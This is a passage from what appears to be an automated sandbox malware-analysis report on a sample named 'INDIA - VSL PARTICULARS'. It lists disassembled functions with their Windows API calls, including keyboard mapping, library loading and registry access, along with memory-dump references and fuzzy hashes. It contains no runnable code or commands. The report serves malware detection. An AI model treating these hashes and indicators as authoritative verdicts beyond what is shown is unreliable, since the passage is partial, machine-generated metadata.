                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                              Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                              Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                              Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 442100245-0
                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                              • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                              Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                              • _wcslen.LIBCMT ref: 0045F94A
                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                              • String ID: 0
                              • API String ID: 621800784-4108050209
                              • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                              • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                              Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SetErrorMode.KERNEL32 ref: 004781CE
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • SetErrorMode.KERNEL32(?), ref: 00478270
                              • SetErrorMode.KERNEL32(?), ref: 00478340
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                              • String ID: \VH
                              • API String ID: 3884216118-234962358
                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                              • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                              Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Library$AddressFreeLoadProc
                              • String ID: AU3_GetPluginDetails$#v
                              • API String ID: 145871493-3662034293
                              • Opcode ID: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                              • Opcode Fuzzy Hash: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                              Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                              • IsMenu.USER32(?), ref: 0044854D
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                              • DrawMenuBar.USER32 ref: 004485AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert
                              • String ID: 0
                              • API String ID: 3076010158-4108050209
                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                              • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                              Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 1589278365-1403004172
                              • Opcode ID: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                              • Opcode Fuzzy Hash: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                              Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                              • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                              Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                              • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                              Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: SysAnimate32
                              • API String ID: 0-1011021900
                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                              • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                              Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                              • GetFocus.USER32 ref: 0046157B
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                              • __swprintf.LIBCMT ref: 00461608
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                              • String ID: %s%d
                              • API String ID: 2645982514-1110647743
                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                              Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                              Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$CloseCountersCurrentHandleOpen
                              • String ID:
                              • API String ID: 3488606520-0
                              • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                              • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                              Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
